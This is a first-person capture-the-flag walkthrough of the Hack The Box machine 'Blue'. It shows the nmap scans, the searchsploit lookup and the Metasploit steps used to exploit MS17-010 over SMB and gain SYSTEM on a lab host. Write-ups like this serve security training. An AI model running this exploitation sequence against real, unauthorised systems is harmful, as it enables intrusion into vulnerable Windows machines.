Hack The Box - Blue

If you give a hacker a new toy, the first thing he ll do is take it apart to figure out how it works. - Jamie Zawinski

Reconnaissance

To recon this box I started with nmap as usual.

nmap -sC -sV 10.10.10.40

After the initial search the most obvious place to look for a way in is the smb service. I did another nmap scan this time using — script vuln to check for vulnerabilities on port 445.

nmap — script vuln -p445 10.10.10.40

ms17–010 looks t be the way in so I used searchsploit to check for exploits.

searchsploit ms17–010

Exploitation

For the exploitation step I can see there is probably a metasploit module due to the *.rb results in searchsploit. After opening metasploit a search for 17–010 gives a few results.

search 017–010

Since I know from the first nmap scan the host is running win 7 I use the #3 result. Once it’s loaded using use 3 all thats left is to check if any options need set and then running the exploit.

options

The only required option that doesn’t have a default value is RHOSTS. After setting the RHOSTS value to 10.10.10.40 it’s time to run the exploit using either the run or exploit commands.

run

The exploit ran successfully and whoami shows we have system authority so we can collect both flags.

flags